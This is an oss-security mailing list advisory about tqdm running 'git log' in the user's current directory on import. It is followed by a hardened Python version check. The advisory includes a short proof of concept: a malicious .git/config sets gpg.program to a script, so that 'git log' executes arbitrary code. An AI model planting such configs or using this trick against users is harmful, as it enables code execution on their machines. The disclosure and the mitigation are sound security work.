Date: Sun, 25 Dec 2016 21:47:43 +0100
From: Jakub Wilk <jwilk@...lk.net>
To: oss-security@...ts.openwall.com
Subject: tqdm: insecure use of git

tqdm <https://github.com/tqdm/tqdm> is a "fast, extensible progress bar for Python".

When you import tqdm, the tqdm._version module executes the following command:

  git log -n 1 --oneline

This was meant to check if the user is running a pre-release version of tqdm. But cwd might be a part of an unrelated git repository, possibly a malicious one.

At least with git 2.10 or later, it's possible to craft a repo in which "git log" executes arbitrary code:

  $ tail -n4 /tmp/.git/config
  [log]
          showSignature = true
  [gpg]
          program = /tmp/moogpg

  $ tail -n4 /tmp/moogpg
  #!/bin/sh
  exec > /dev/tty 2>&1
  cowsay pwned
  sleep 9999

  $ cd /tmp
  $ pydoc tqdm
   _______
  < pwned >
   -------
          \   ^__^
           \  (oo)\_______
              (__)\       )\/\
                  ||----w |
                  ||     ||

Upstream bug report: https://github.com/tqdm/tqdm/issues/328

Affected versions: v4.4.1 and later.

-- 
Jakub Wilk
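The version check described in the post, rewritten so that git is never run against the interpreter's cwd. This is an added example, not code from the post or from tqdm; `find_git_root`, `git_head_oneline_unsafe` and `git_head_oneline` are hypothetical names, and the `run` parameter exists only so the subprocess call can be stubbed in tests.

```python
import os
import subprocess


def find_git_root(start):
    """Walk upward from `start` and return the first directory containing a
    `.git` entry (directory or worktree file), or None if none is found."""
    path = os.path.abspath(start)
    while True:
        if os.path.lexists(os.path.join(path, ".git")):
            return path
        parent = os.path.dirname(path)
        if parent == path:  # reached the filesystem root
            return None
        path = parent


def git_head_oneline_unsafe(run=subprocess.run):
    """The pattern reported above: git runs in the interpreter's cwd, so
    whatever repository the user happens to be standing in supplies the
    config (log.showSignature, gpg.program, ...)."""
    proc = run(["git", "log", "-n", "1", "--oneline"],
               capture_output=True, text=True)
    return proc.stdout.strip()


def git_head_oneline(package_dir, run=subprocess.run):
    """Hardened variant: inspect only the checkout that contains the package's
    own source files, never the process cwd. Returns the HEAD one-line log,
    or None when the package is not inside a git checkout (the normal case
    for a wheel installed into site-packages) or git fails."""
    root = find_git_root(package_dir)
    if root is None:
        return None
    # Drop inherited GIT_* variables (GIT_DIR, GIT_CONFIG_GLOBAL, ...) so the
    # caller's environment cannot redirect git to a different repository.
    env = {k: v for k, v in os.environ.items() if not k.startswith("GIT_")}
    cmd = ["git", "--no-pager",
           "-c", "log.showSignature=false",  # command-line -c overrides .git/config
           "log", "-n", "1", "--oneline"]
    proc = run(cmd, cwd=root, env=env, capture_output=True, text=True)
    if proc.returncode != 0:
        return None
    return proc.stdout.strip()
```

Even with these changes, a checkout that is itself untrusted still controls what git does; the point is that merely starting Python inside someone else's repository no longer matters.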